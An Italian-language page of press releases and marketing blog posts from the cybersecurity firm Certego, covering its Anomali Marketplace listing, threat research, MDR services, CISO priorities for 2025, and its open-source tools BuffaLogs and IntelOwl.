Modena, 9 aprile 2025 - Certego, azienda modenese leader nel settore della cybersecurity e specializzata in servizi MDR e Threat Intelligence, annuncia il proprio ingresso nel Marketplace di Anomali, una delle principali piattaforme globali per la raccolta, l’analisi e la condivisione delle minacce informatiche.

Le aziende potranno così accedere ai feed di Threat Intelligence di Certego direttamente dalla piattaforma Anomali, integrandoli nei loro sistemi SOC, SIEM e altre soluzioni di sicurezza per ottenere informazioni specifiche e tempestive sulle minacce più rilevanti.

“Essere presenti nel Marketplace di Anomali – dichiara Bernardino Grignaffini Gregorio, CEO e Founder di Certego - significa fare parte di un ecosistema consolidato di Threat Intelligence, rendendo i feed di Certego accessibili a un’ampia rete di aziende, team di sicurezza e istituzioni che operano in contesti critici. Questo rafforza l’impegno di Certego nella protezione del tessuto economico e industriale, fornendo dati concreti per anticipare e contrastare le minacce più pericolose”.

Anomali è una piattaforma globale leader, potenziata dall’IA, per la sicurezza e le operazioni IT, che consente alle aziende di rilevare, indagare e rispondere proattivamente alle minacce informatiche. Aggregando e correlando dati da più fonti, Anomali aiuta le organizzazioni a individuare attività sospette e migliorare le strategie difensive contro gli attacchi. Tramite il suo Marketplace, gli utenti possono accedere a feed di intelligence di alta qualità da fornitori di primo piano a livello mondiale, tra cui Certego.

Un’offerta di Threat Intelligence su misura per il mercato italiano ed Europeo

La presenza di Certego nel Marketplace di Anomali non è solo un riconoscimento della qualità e dell’affidabilità dei suoi dati, ma rappresenta anche un’opportunità strategica per le organizzazioni che necessitano di una Threat Intelligence mirata e contestualizzata. Certego fornisce indicatori di compromissione (IOC) e informazioni di intelligence specificamente focalizzate sulle esigenze delle aziende e istituzioni operanti in Italia e in Europa, aiutandole a contrastare le minacce più rilevanti per queste aree.

Le minacce informatiche diventano sempre più sofisticate e si evolvono nei diversi settori. Certego si distingue offrendo intelligence costantemente aggiornata e analizzata, permettendo a imprese e istituzioni di rafforzare le difese e migliorare la risposta agli incidenti.

“La nostra integrazione nel Marketplace di Anomali rappresenta un traguardo importante per Certego e per la cybersecurity – conclude Grignaffini – grazie a questa collaborazione, mettiamo a disposizione di un pubblico ancora più ampio la nostra expertise e i nostri feed di Threat Intelligence, con un focus specifico sulle minacce più rilevanti.”

“L’integrazione di Certego nell’Anomali Marketplace rafforza il nostro ecosistema, offrendo alle organizzazioni un’intelligence altamente mirata, pensata per i mercati italiano ed europeo,” afferma Alex Depret Bixio, Senior Vice President, Anomali International market. “Questa partnership garantisce ai team di sicurezza insight puntuali, per poter agire con prontezza e sicurezza.”

La sicurezza informatica è una sfida globale, ma richiede soluzioni su misura per ogni contesto. Con questa iniziativa, Certego conferma il suo ruolo di riferimento per la cybersecurity e rafforza il suo impegno nella lotta contro le minacce informatiche, fornendo alle aziende strumenti concreti per proteggere le proprie infrastrutture digitali.

Certego

Certego è un’azienda italiana con 12 anni di esperienza specializzata in Threat Intelligence e Managed Detection & Response (MDR), fornisce servizi avanzati di cyber security con l’obiettivo di proteggere aziende e istituzioni dalle minacce informatiche. Grazie alla piattaforma proprietaria PanOptiKon®, un team dedicato di esperti SecOps e Incident Response attivo 24/7 e un focus particolare sulla Threat Intelligence, Certego aiuta le organizzazioni a prevenire, rilevare e rispondere agli attacchi informatici in modo efficace e tempestivo.

Anomali

Anomali offre la principale piattaforma per la sicurezza e le operazioni IT potenziata dall’intelligenza artificiale. Anomali integra in un’unica potente piattaforma ETL, SIEM, Next-Gen SIEM, XDR, UEBA, SOAR e TIP. Al centro vi è Anomali Copilot, che opera su un Data Lake proprietario, cloud-native, per garantire velocità, scalabilità e prestazioni senza pari a costi ridotti. Modernizza la sicurezza e le operazioni IT per proteggere e far crescere la tua organizzazione con analisi migliori, maggiore visibilità, produttività e fidelizzazione del talento. Anomali

Threat Research

Pier Giorgio Bergonzi, Product Marketing — Thu, 03 Apr 2025 22:00:00 GMT

Un servizio MDR efficace non si misura solo nella risposta, ma nella capacità di anticipare il rischio.

Al centro di questa proattività c’è la Threat Research, ovvero lo studio approfondito di tattiche, tecniche e procedure (TTPs) impiegate dai cybercriminali. Questo approccio trasforma i dati di cybersecurity in intelligence operativa, garantendo un servizio MDR che non solo protegge, ma evolve per anticipare le minacce di ultima generazione.

1. Identifica le minacce e le tecniche di attacco emergenti

I cybercriminali affinano costantemente le proprie tecniche per eludere le difese esistenti. La Threat Research svolge un ruolo cruciale nell'identificare tempestivamente queste tattiche in evoluzione, consentendo ai difensori di adattare proattivamente la propria postura di sicurezza. Attraverso l’analisi continua di tattiche, tecniche e procedure (TTPs) — mappate su framework riconosciuti come MITRE ATT&CK e validate dall’osservazione di attacchi reali — la Threat Research consente di individuare indicatori di compromissione emergenti e di anticipare le mosse degli aggressori, aggiornando le regole di rilevamento dei sistemi di difesa prima che si trasformino in incidenti.

2. Fornisce un contesto analitico per una risposta più rapida ed efficace

Quando un attacco viene rilevato, comprendere rapidamente “chi”, “come” e “perché” è fondamentale per rispondere in maniera tempestiva. L’analisi approfondita dei TTPs consente ai team di incident response di disporre di playbook strutturati e workflow automatizzati, accelerando le fasi di contenimento e risposta. Questa prontezza operativa può ridurre i tempi di reazione fino al 50%, migliorando la qualità dell’intervento e limitando l’impatto sulle attività aziendali.

3. Consente di creare regole di rilevamento sempre aggiornate e potenziate

La Threat Research consente di generare regole di rilevamento dinamiche, sempre aggiornate e basate su comportamenti reali osservati sul campo. Quando, attraverso lo studio, vengono individuati degli indicatori di compromissione, le regole di detection vengono aggiornate per rilevare questi tipi di attacchi nelle differenti fasi della kill chain. Invece di affidarsi a configurazioni statiche, i motori di detection vengono alimentati con indicatori di compromissione contestualizzati e tempestivi. Il risultato è un sistema più preciso, in grado di produrre alert ad alta fedeltà, ridurre drasticamente i falsi positivi e reagire in modo mirato alle tecniche emergenti utilizzate dagli attaccanti.

4. Guida le strategie di sicurezza a lungo termine

Analizzando trend settoriali, gap infrastrutturali e profili degli avversari, la Threat Research fornisce insight strategici per pianificare roadmap di cybersecurity allineate agli obiettivi di business. Questa visione data driven supporta decisioni di investimento mirate in vulnerability management, formazione e rafforzamento della postura difensiva.

In un contesto in cui le minacce evolvono più rapidamente delle tecnologie stesse, la Threat Research si afferma come un pilastro fondamentale per una difesa informatica realmente proattiva. Affidarsi a un servizio di Managed Detection & Response basato su un’intensa attività di Threat Research significa dotarsi di una capacità predittiva e adattiva, trasformando ogni dato raccolto in un’opportunità di protezione e miglioramento continuo.

State of cybersecurity - 2024 RECAP

Sun, 23 Mar 2025 23:00:00 GMT

State of Cybersecurity è la ricerca realizzata da Certego per AUSED – l’Associazione tra Utenti di Sistemi e Tecnologie dell’Informazione che raccoglie oltre duecento aziende italiane – ed è stata recentemente ripresa anche da Il Corriere della Sera, a conferma della sua rilevanza nazionale.

L’obiettivo della ricerca, basata su un campione di 1.200.000 asset monitorati all’interno della piattaforma PanOptikon®, è confrontare i volumi di attacco del 2024, con quelli del 2023, per indagare lo stato di sicurezza delle aziende italiane e le metodologie di attacco dei cyberciminali.

Gli incidenti sono diventati più pericolosi? Quali sono le superfici di attacco più a rischio? Quali sono i settori maggiormente esposti? Qual è il rapporto tra falsi positivi e incidenti reali?

Sono alcune delle domande a cui rispondiamo all’interno del report.

Compila il form per ricevere il pdf.

Threat Intelligence - Vulnerability insights

Thu, 06 Mar 2025 23:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di febbraio 2025, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

Notifica e gestione Incident Response

Pier Giorgio Bergonzi, Product Marketing — Thu, 27 Feb 2025 23:00:00 GMT

Il panorama della cybersecurity richiede una gestione sempre più efficace e rapida delle attività di monitoraggio e risposta agli incidenti. Una piattaforma unificata per la gestione delle attività di Detection e Response si distingue per la capacità di centralizzare tutti gli aspetti operativi. Uno dei benefici più significativi dal punto di vista dell’operatività è la gestione semplificata e ottimizzata delle comunicazioni tra il team di Security Operations del fornitore MDR (Managed Detection and Response) e il cliente.

Perché una piattaforma unificata fa la differenza

Le organizzazioni che si affidano ai fornitori MDR per la sicurezza possono affrontare difficoltà nella comunicazione e nel coordinamento. L'uso di strumenti diversi, a volte non integrati, può causare inefficienze, ritardi e fraintendimenti, compromettendo la rapidità e l'efficacia nella gestione degli incidenti. Una piattaforma unificata elimina queste criticità, offrendo un ambiente centralizzato dove informazioni, alert e attività sono facilmente accessibili sia al cliente che al fornitore.

Di seguito, analizziamo i principali benefici di una piattaforma unificata per la gestione delle comunicazioni tra il provider MDR e il cliente:

1. Maggiore velocità di risposta agli incidenti

Notifiche in tempo reale:

SecOps e cliente interagiscono direttamente su un’unica interfaccia, condividendo informazioni e dati fondamentali senza passare da sistemi separati come email o altre piattaforme esterne. Il cliente riceve aggiornamenti immediati su minacce e azioni intraprese, consentendo un’azione tempestiva.
Incident Response più agile:

La possibilità di comunicare, analizzare e attivare le procedure di Incident Response restando in un unico ambiente riduce i tempi di reazione e semplifica la collaborazione, evitando rallentamenti dovuti a scambi di informazioni frammentati.

2. Significativa riduzione degli errori e delle incomprensioni

Chiarezza delle procedure:

Grazie a una piattaforma unificata le attività sono definite con precisione e costantemente tracciate. In questo modo, SecOps e cliente mantengono un allineamento continuo sulle azioni da intraprendere nella gestione dell’incidente.
Comunicazione standardizzata:

L’utilizzo di procedure di comunicazione predefinite riduce i margini di errore e assicura che le informazioni siano comprese correttamente da entrambe le parti.

3. Collaborazione migliorata

Accesso centralizzato ai dati:

Tutte le informazioni relative agli incidenti, agli alert e alle attività investigative sono disponibili in un unico luogo. Questo consente al cliente di avere una visione chiara e completa della situazione in tempo reale.
Storico delle comunicazioni:

Grazie a un archivio integrato, le comunicazioni passate e le decisioni prese sono sempre facilmente consultabili.

4. Miglioramento della gestione delle risorse interne

Riduzione dei carichi operativi:

Grazie alla semplificazione delle comunicazioni, i team interni del cliente possono concentrarsi su attività strategiche, anziché dedicare tempo alla gestione manuale delle informazioni.
Flessibilità e scalabilità:

La piattaforma supporta la crescita dell’azienda, adattandosi alle esigenze in evoluzione.

5. Esperienza utente ottimizzata

Interfaccia intuitiva:

L’utilizzo di un unico sistema riduce la curva di apprendimento per i team del cliente, migliorando l’esperienza complessiva.
Supporto continuo:

La piattaforma consente al fornitore MDR di fornire un supporto più reattivo e proattivo, creando un rapporto di fiducia e partnership con il cliente.

Un valore aggiunto per il business

Oltre a migliorare le comunicazioni, una piattaforma unificata consente ai clienti di ottenere maggiore controllo sulle operazioni di sicurezza, migliorando l’allineamento strategico con il proprio fornitore MDR. Questo si traduce in una gestione più efficace dei rischi, una riduzione dei costi operativi e una maggiore resilienza dell’organizzazione. In un mondo dove la rapidità e l’efficacia della risposta agli incidenti fanno la differenza, l’adozione di una piattaforma unificata di Security Operations rappresenta non solo una scelta strategica, ma un vantaggio competitivo. Una piattaforma unificata per la gestione della cybersecurity non è solo uno strumento tecnico, ma un abilitatore di collaborazione e trasparenza.

Investire in una soluzione di questo tipo significa creare le basi per un approccio più efficace e coordinato alla sicurezza, che beneficia sia il cliente che il fornitore.

In Certego, crediamo fermamente che la chiave per una cybersecurity di successo risieda in una comunicazione fluida e in una gestione centralizzata delle operazioni.

Threat Intelligence - Vulnerability insights

Wed, 12 Feb 2025 23:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di gennaio 2025, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

Security Operations Report - Gennaio 2025

Sun, 02 Feb 2025 23:00:00 GMT

Avere una chiara consapevolezza dei rischi a cui le aziende sono maggiormente esposte è essenziale per comprendere i trend degli attacchi informatici.

Il report realizzato dal team di Security Operations di Certego, basato su un campione di 1.200.000 asset IT di aziende italiane di diverse dimensioni e settori, offre una panoramica preziosa delle minacce attuali.

Grazie alla piattaforma PanOptikon®, che integra avanzate funzioni di data analytics, abbiamo potuto identificare le principali tendenze, vulnerabilità e minacce nel panorama della cybersecurity italiana aggiornate a gennaio 2025.

L’approccio metodologico ha permesso di ottenere una visione dettagliata e costantemente aggiornata dei rischi informatici che le aziende italiane affrontano, offrendo uno strumento fondamentale per comprendere le criticità e migliorare la sicurezza aziendale.

Il report risponde a domande cruciali, come:

Gli incidenti sono diventati più pericolosi? Quali settori risultano maggiormente vulnerabili? Qual è la proporzione tra falsi positivi e incidenti reali?

Compila il modulo per ricevere il PDF completo.

CISO 2025

Pier Giorgio Bergonzi, Product Marketing — Sun, 26 Jan 2025 23:00:00 GMT

La cybersecurity è ormai fondamentale per la resilienza organizzativa. In un contesto di rapide innovazioni tecnologiche e crescenti minacce geopolitiche, le strategie proattive sono essenziali per affrontare minacce sofisticate e tutelare fiducia e reputazione. Anche settori tradizionalmente meno a rischio sono ora vulnerabili, richiedendo decisioni strategiche e un approccio adattivo per garantire una protezione efficace. Guardando al futuro, è cruciale considerare le sfide principali che i CISO affronteranno nel 2025, guidate da un panorama di minacce in continua evoluzione.

1. Garantire conformità alla direttiva NIS2

La direttiva NIS2 estende il proprio ambito, includendo un numero maggiore di aziende chiamate a conformarsi a requisiti rigorosi per rafforzare la sicurezza delle infrastrutture critiche e garantire la resilienza operativa. Per allinearsi a queste normative, le organizzazioni devono affrontare molteplici sfide, tra cui la mappatura delle vulnerabilità, la gestione dei rischi e l’implementazione di processi di Incident Response in grado di rispettare le tempistiche e modalità di comunicazione degli incidenti alle autorità competenti

È cruciale che il processo di adeguamento non sia delegato esclusivamente al CISO o al dipartimento IT, ma venga affrontato come uno sforzo condiviso tra le funzioni aziendali. Il CISO assume il ruolo di coordinatore, assicurando che ogni settore contribuisca al raggiungimento degli obiettivi di conformità.

Per le attività più critiche, come la gestione dell’Incident Response, il supporto di provider di cybersecurity specializzati può garantire una risposta rapida e conforme alle tempistiche di notifica previste dalla normativa.

2. Colmare il gap con i cybercriminali

Per rispondere all'evoluzione delle minacce, come il Ransomware-as-a-Service e l'uso avanzato dell'intelligenza artificiale da parte degli aggressori, le aziende devono adottare strategie di difesa che combinino approcci olistici e proattivi. L’approccio olistico combina persone, processi e tecnologie, creando una difesa multilivello. Valutazioni periodiche delle vulnerabilità, simulazioni pratiche e aggiornamenti dei piani di risposta sono fondamentali per rafforzare la resilienza aziendale e allineare le strategie di sicurezza agli obiettivi operativi.

Parallelamente, un approccio proattivo è indispensabile per rimanere un passo avanti rispetto agli attacchi. Grazie all’uso della threat intelligence e all’analisi dei comportamenti degli avversari, le aziende possono anticipare le tecniche di attacco emergenti e adattare i sistemi di difesa in modo tempestivo. Questo permette di prevenire efficacemente le minacce e di migliorare significativamente la sicurezza complessiva.

3. Difendersi dagli attacchi potenziati dall’Intelligenza Artificiale

L’adozione dell’intelligenza artificiale (AI) da parte dei cybercriminali sta trasformando profondamente il panorama delle minacce, con attacchi sempre più mirati, adattivi e difficili da individuare. Entro il 2025, Gartner prevede che almeno il 30% degli attacchi sarà potenziato dall’AI, utilizzando tecniche come phishing automatizzato, malware che evolve dinamicamente e rilevamento in tempo reale delle vulnerabilità nei sistemi aziendali.

Per contrastare questi rischi, le aziende devono implementare tecnologie in grado di analizzare un numero sempre maggiore di dati di cybersecurity in tempo reale per identificare le anomalie con precisione. Strumenti basati sulla visibilità dei dati grezzi di cybersecurity e correlazione degli eventi permettono di monitorare ogni angolo dell’infrastruttura, migliorando il rilevamento e la gestione degli incidenti, con una significativa riduzione dei falsi positivi.

4. Automatizzare le attività ripetitive nei Security Operations Center (SOC)

Per gestire la crescente complessità delle minacce informatiche, è cruciale implementare soluzioni in grado di automatizzare le attività ripetitive nei Security Operations Center (SOC). Operazioni come la correlazione degli eventi, il triage delle minacce e la gestione dei falsi positivi possono essere automatizzate per migliorare l’efficienza e ridurre il carico di lavoro sul personale.

Queste automazioni consentono di velocizzare le operazioni quotidiane, riducendo i tempi di reazione e minimizzando il rischio di errori umani. Con processi più snelli e standardizzati, i team di sicurezza possono dedicarsi a minacce più complesse e strategiche, aumentando così la capacità dell’organizzazione di rispondere efficacemente agli attacchi.

5. Dimostrare il valore della sicurezza al board e agli stakeholder

La capacità di collegare la sicurezza agli obiettivi aziendali è fondamentale per ottenere il supporto del board e degli stakeholder. Fornire dati chiari sui benefici tangibili delle iniziative di cybersecurity, come la riduzione del rischio e il miglioramento dell’efficienza operativa, aiuta a dimostrare il valore strategico degli investimenti in sicurezza.

Metodi di qualificazione del rischio, supportati da piattaforme tecnologiche in grado di esportare report di cybersecurity, consentono di tradurre le priorità tecniche in termini comprensibili per il consiglio di amministrazione. Questi strumenti aiutano a evidenziare il valore degli investimenti in ambito cyber, favorendo decisioni più consapevoli e un’integrazione strategica della sicurezza nell'azienda, con un focus sulle aree più critiche per rafforzare la resilienza complessiva

6. Prevedere piani efficaci di Incident Response

L’aumento degli attacchi informatici rende indispensabile dotarsi di piani di Incident Response ben strutturati per minimizzare l’impatto delle minacce. Tecniche di attacco sempre più sofisticate, come gli attacchi DDoS, che sfruttano botnet e strategie multi-vettore per eludere le difese tradizionali e compromettere la stabilità delle infrastrutture, richiedono protocolli chiari e costantemente aggiornati. Testare regolarmente i piani di Incident Response attraverso esercitazioni pratiche garantisce una risposta rapida e coordinata, riducendo al minimo i tempi di inattività.

Allenarsi alla gestione degli incidenti e pianificare procedure di tactical response consente di proteggere le operazioni aziendali, bilanciando la crescente pressione sulle funzioni di sicurezza con l’esigenza di mantenere la continuità operativa. Un approccio ben pianificato e collaudato permette alle aziende di reagire efficacemente anche nei momenti più critici.

7. Adottare un approccio Zero Trust

Il furto di credenziali e le minacce interne rappresentano rischi crescenti, specialmente con l’espansione del lavoro ibrido. Adottare un modello di sicurezza Zero Trust, che presuppone che nessun utente o dispositivo, sia interno che esterno alla rete, sia automaticamente considerato affidabile, è una strategia essenziale per mitigare questi rischi.

Questo approccio non solo rafforza la sicurezza delle infrastrutture aziendali, ma riduce anche significativamente il rischio di abusi da parte di attori interni ed esterni, garantendo una protezione più solida e completa.

8. Continuare a formare e sensibilizzare il personale

Investire nella formazione continua è essenziale per ridurre il rischio di errori umani e aumentare la consapevolezza sulle pratiche di sicurezza informatica. Programmi di sensibilizzazione mirati aiutano i dipendenti a riconoscere minacce comuni, come phishing e malware, migliorando la capacità dell’organizzazione di prevenire gli attacchi.

Una forza lavoro ben informata rappresenta una delle prime linee di difesa più efficaci e contribuisce significativamente al rafforzamento della postura di sicurezza aziendale.

Certego MDR: la soluzione completa per le nuove sfide di Cybersecurity

I servizi di Managed Detection & Response di Certego si basano sulla piattaforma proprietaria PanOptikon®, progettata per abilitare il monitoraggio in tempo reale, l'analisi e la risposta agli incidenti, facilitando anche l'interazione diretta tra il team IT del cliente e il Detection & Response team di Certego. Grazie al suo approccio modulare, la piattaforma si adatta facilmente all'infrastruttura organizzativa e può scalare per rispondere a nuove esigenze.

Affiancano la piattaforma un team specializzato di Security Operations e un'intensa attività di ricerca nella Cyber Threat Intelligence, che garantiscono un supporto completo e innovativo nei servizi di Managed Detection & Response.

Questa combinazione tra tecnologia avanzata, competenze specialistiche e analisi approfondita delle minacce consente a Certego, da oltre 12 anni, di essere un leader innovativo nei servizi di Managed Detection & Response.

FOSDEM 2025

Pier Giorgio Bergonzi, Product Marketing — Sun, 19 Jan 2025 23:00:00 GMT

Il 1° febbraio prenderemo parte, in qualità di relatori, all’edizione 2025 del FOSDEM, uno dei principali eventi internazionali dedicati al mondo software Open Source, che si terrà a Bruxelles.

Federico Foschini e Lorena Goldoni di Certego presenteranno BuffaLogs, la soluzione di Authentication Protection integrata nella nostra piattaforma Panoptikon®, progettata per estendere la capacità di individuare all’origine i login anomali e migliorare le capacità di analisi dei team di Security Operations.

Link all'evento: clicca qui!

BuffaLogs è stato sia rilasciato come software Open Source, sia integrato con successo all’interno della piattaforma MDR Certego PanOptikon®, per estendere la capacità di individuare gli accessi potenzialmente pericolosi sulle infrastrutture dei clienti Certego e migliorare le capacità di analisi del team di Detection and Response.

Come funziona?

Mediante l'applicazione di logiche di rilevamento specifiche, il sistema esamina ogni singolo accesso registrato su diverse sorgenti, quali firewall, applicazioni web o ambienti cloud. Lo scopo è individuare autenticazioni anomale e generare immediatamente notifiche di allarme. Per rendere l'applicativo personalizzabile in base alle specifiche esigenze di ogni azienda, BuffaLogs consente di:

Definire un livello di rischio personalizzato per ciascun utente;
Applicare appositi filtri per escludere specifici accessi dalle attività di rilevamento, sia relativi ai Paesi da cui provengono o da specifici indirizzi IP.

Infine, possono anche essere notificati degli "utenti vip", con alti privilegi nel sistema, per i quali si desidera dedicare una particolare attenzione.

Qual è la caratteristica che lo rende innovativo?

Sul mercato sono presenti diverse soluzioni di rilevamento dei login anomali, ma essendo applicativi proprietari, anche se acquistati, forniscono alle organizzazioni o ai team di rilevamento solo alert di tipo generico, senza informazioni di contesto e pochi dettagli.

A differenza delle soluzioni proprietarie, BuffaLogs si distingue come un'applicazione Open Source con codice sorgente pubblico. Questa particolare caratteristica, unita al fatto che l'applicazione è stata sviluppata internamente da Certego, ci permette di analizzare in modo dettagliato le ragioni per cui un allarme è stato attivato, consultare i dati grezzi circostanti e aggiornare il codice per rispondere alle nuove esigenze emergenti.

Scopri tutti i dettagli della soluzione:

Threat Intelligence - Vulnerability insights

Sun, 12 Jan 2025 23:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di dicembre 2024, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

IntelOwl compie gli anni

Pier Giorgio Bergonzi, Product Marketing — Mon, 06 Jan 2025 23:00:00 GMT

Quando, all’inizio del 2020, abbiamo dato vita al progetto IntelOwl, eravamo consapevoli delle difficoltà che la comunità di cyber security doveva affrontare per automatizzare le attività di routine legate alla Threat Intelligence. Il nostro obiettivo era andare oltre la semplice aggregazione, classificazione e condivisione di informazioni cruciali — dagli indicatori di compromissione (IoC) all’analisi di vari tipi di osservabili (IP, domini, hash e file) — per semplificare e migliorare il lavoro degli analisti di sicurezza.

Nel tempo, la versione open source di IntelOwl ha ottenuto un importante consenso internazionale, come dimostrano le quasi 4.000 “star” su GitHub, diventando uno dei principali progetti internazionali di Threat Intelligence sulla piattaforma e continuando a evolversi per sostenere le attività quotidiane degli analisti.

Nella sua forma più avanzata, IntelOwl si integra perfettamente nell’ecosistema Certego e, grazie alla collaborazione nativa con la piattaforma Certego di Unified Security Operations, PanOptikon®, facilita la gestione e la condivisione di ogni tipo di informazione critica, incrementando l’efficacia dei nostri servizi MDR e accelerando le procedure di analisi e risposta agli incidenti all’interno del Security Operations Center di Certego.

Dal rilascio precedente a oggi, il nostro lavoro si è focalizzato sul potenziamento e la trasformazione di IntelOwl, che da semplice piattaforma di data extraction è diventata una vera e propria soluzione di Threat Intelligence Investigation.

Perché è nato IntelOwl

In Certego, tutte le nostre attività di Managed Detection and Response (MDR) si basano in modo fondamentale sulla Threat Intelligence, perché ci consente di anticipare le mosse degli avversari e reagire prima che possano sfruttare le proprie tattiche e vulnerabilità. Da questa esigenza è nata l’idea di creare uno strumento open source in grado di raccogliere in un unico luogo un grande volume di informazioni provenienti da diverse fonti: servizi OSINT, feed di minacce, database reputazionali e molto altro.

Con IntelOwl, siamo riusciti a costruire una piattaforma affidabile, che aiuta i nostri analisti e gli addetti ai lavori della cybersecurity a estrarre rapidamente dati di qualità, comprendere le potenziali minacce e adattare in anticipo i sistemi di difesa. In questi cinque anni, l’ecosistema del progetto si è evoluto, abbracciando un approccio sempre più collaborativo grazie al sostegno di una vivace community di sviluppatori e ricercatori di sicurezza.

Le tappe più importanti

Ripercorrendo la storia di IntelOwl, ci sono alcuni momenti che hanno segnato la nostra crescita:

1- Integrazione con numerose fonti di dati

Fin da subito, ci siamo impegnati per garantire l’accesso a quante più fonti di intelligence possibili, offrendo una visione ampia sugli indicatori di compromissione (IoC).
2- Supporto e collaborazione open source

Il progetto è aperto alla community di sviluppatori, ricercatori e analisti di sicurezza, che rappresenta il vero motore dell’innovazione. I contributi di ognuno hanno permesso di correggere rapidamente i bug e di implementare nuove funzionalità.
3- Crescita della popolarità e adozione enterprise

Da progetto sperimentale, IntelOwl si è affermato come soluzione affidabile, adottata da numerose organizzazioni. La nostra piattaforma ha dimostrato di poter scalare sia a livello tecnologico che di integrazione nei processi aziendali

IntelOwl v6

La sesta versione della piattaforma ha rappresentato un punto di svolta cruciale per il software di Threat Intelligence di Certego. Dall’ultima release ad oggi abbiamo lavorato duramente per potenziare e trasformare IntelOwl da una piattaforma di Data Extraction ad una Threat Intelligence Investigation Platform.

L’ultima release di IntelOwl ha apportato un significativo avanzamento con l'integrazione del framework di indagine. Questo strumento consente agli analisti di condurre indagini dettagliate su più indicatori specifici di compromissione e di collegarli tra loro, fornendo un quadro completo delle attività sospette. Grazie a questa funzionalità, gli analisti ora dispongono di una piattaforma unificata per l'aggregazione, l'analisi individuale e la correlazione degli indicatori, facilitando la costruzione di dettagliate mappe investigative.

Uno sguardo al futuro

Il nostro impegno non si ferma qui. Puntiamo a far crescere ulteriormente l’ecosistema di IntelOwl, continuando a:

Integrare nuove fonti e strumenti di Intelligenza Artificiale

Per restare al passo con le minacce in evoluzione, miriamo a integrare costantemente nuove soluzioni, compresi strumenti di IA che non esistevano quando il progetto ha preso forma. Il nostro obiettivo è offrire una copertura sempre più completa e potenziare il valore delle informazioni di Threat Intelligence.
Coinvolgere la community

Siamo convinti che l’interazione con la community sia fondamentale per migliorare e innovare costantemente IntelOwl. Accogliamo suggerimenti e proposte attraverso diversi canali: il nostro repository GitHub, l’account X e il canale Slack. Ogni contributo, grande o piccolo, contribuisce a rendere IntelOwl uno strumento sempre più potente.
Rilasciare aggiornamenti periodici

A partire dall'ultima release (v6), abbiamo deciso di introdurre un ciclo di aggiornamenti programmati, per assicurare alla community — e a tutti coloro che utilizzano IntelOwl — un flusso costante di novità e migliorie. Questa nuova cadenza di rilascio riflette il nostro impegno a mantenere il software sempre aggiornato, ascoltando i feedback degli utenti e rispondendo rapidamente alle esigenze del panorama della Threat Intelligence.

Grazie per questi cinque anni

Il successo e la longevità di IntelOwl sono il risultato della passione con cui il team Certego, i collaboratori open source e l’intera community hanno contribuito al progetto. Grazie a tutti coloro che ci hanno accompagnato fin dall’inizio e a chi ha iniziato a utilizzare IntelOwl più di recente. Continueremo a mettere la nostra Threat Intelligence al centro dei servizi MDR (Managed Detection and Response), per anticipare le tattiche degli avversari e proteggere le infrastrutture con sempre maggiore efficacia. Rimanete sintonizzati sui nostri canali per non perdervi i prossimi sviluppi: la storia di IntelOwl è ancora tutta da scrivere!

Buon compleanno IntelOwl, e che il futuro sia ancora più ricco di successi e innovazioni!

Natale al sicuro

Pier Giorgio Bergonzi, Product Marketing — Wed, 18 Dec 2024 23:00:00 GMT

Il periodo delle feste è finalmente arrivato: un momento per rilassarsi, staccare dal lavoro e trascorrere del tempo con i propri cari. Tuttavia, mentre ti concedi un po' di meritato riposo, i cybercriminali non vanno in vacanza. Anzi, proprio i periodi di ferie rappresentano per loro un’opportunità d’oro: meno occhi puntati sulle infrastrutture aziendali e team IT spesso ridotti.

Sei sicuro che la tua azienda sia protetta mentre ti godi le vacanze? Con un servizio MDR (Managed Detection and Response), un team di esperti qualificati si prende cura della sicurezza della tua infrastruttura aziendale, 24 ore su 24, 7 giorni su 7, anche durante le feste!

Perché i cybercriminali colpiscono (anche) durante le festività?

Durante i periodi di festività, molte aziende operano con il personale IT ridotto. Questo crea una finestra di opportunità per i malintenzionati che sfruttano vulnerabilità non monitorate o tempi di reazione più lenti per sferrare attacchi. Tra i rischi più comuni:

Ransomware - attacchi che criptano i dati aziendali, richiedendo un riscatto per il loro rilascio;
Phishing mirato - e-mail fraudolente progettate per ingannare i dipendenti meno esperti;
Attacchi DDoS - interruzioni dei servizi online fondamentali per il business;
Accessi non autorizzati - sfruttando credenziali rubate o vulnerabilità nei sistemi.

MDR: La protezione continua che non ti lascia mai

Un servizio di Managed Detection and Response (MDR) è pensato per assicurarti una protezione costante dei sistemi informatici, indipendentemente dalla presenza del tuo team interno. Anche durante le festività, mentre la tua squadra IT si gode una meritata pausa, l’MDR combina tecnologie di monitoraggio avanzate e competenze specialistiche attive 24/7 per identificare e contenere tempestivamente qualsiasi minaccia, riducendo al minimo gli impatti operativi e garantendo un livello di sicurezza di primo livello.

Monitoraggio 24/7

Il team di Security Operations di Certego è composto da specialisti senior con competenze eterogenee e in possesso delle principali certificazioni internazionali. Grazie alla piattaforma proprietaria di Unified Security Operations PanOptikon®, i servizi MDR di Certego assicurano una sorveglianza costante, 24 ore su 24, 7 giorni su 7, sull’intera infrastruttura.

Integrando sonde e agenti a livello di rete, endpoint e ambienti cloud, PanOptikon® monitora in tempo reale il traffico e rileva qualsiasi comportamento anomalo, inclusa l’analisi dei dati telemetrici provenienti dagli endpoint.

In caso di un evento sospetto, il team di Security Operations analizza nel dettaglio ogni allarme per comprenderne l’origine, confermarne la natura minacciosa e definire la strategia d’intervento più efficace, per reagire rapidamente, riducendo al minimo la finestra di esposizione alle minacce e garantendo un livello di protezione sempre elevato.

Incident Response

La capacità di intervenire rapidamente in caso di incidente informatico è un elemento chiave di un servizio MDR efficace. Rilevare un attacco è importante, ma sono la rapidità e la precisione della risposta a fare davvero la differenza nel limitare i danni.

Le attività di Incident Response richiedono solide competenze tecniche, organizzative e un’esperienza approfondita nella gestione di situazioni critiche. Il Rapid Incident Response Team di Certego, forte di procedure di risposta predefinite — testate e aggiornate e basate sui principali modelli operativi internazionali, come ad esempio il MITRE ATT&CK Framework — garantisce un approccio strutturato ed efficace nel contenere le minacce e proteggere il business.
Intervento immediato: In caso di minaccia rilevata, il team agisce con prontezza per bloccare e neutralizzare l’attacco, minimizzando l’impatto sull’organizzazione;
Riduzione del downtime: Una risposta tempestiva assicura la continuità operativa, evitando lunghi fermi e limitando le interruzioni nei processi aziendali;
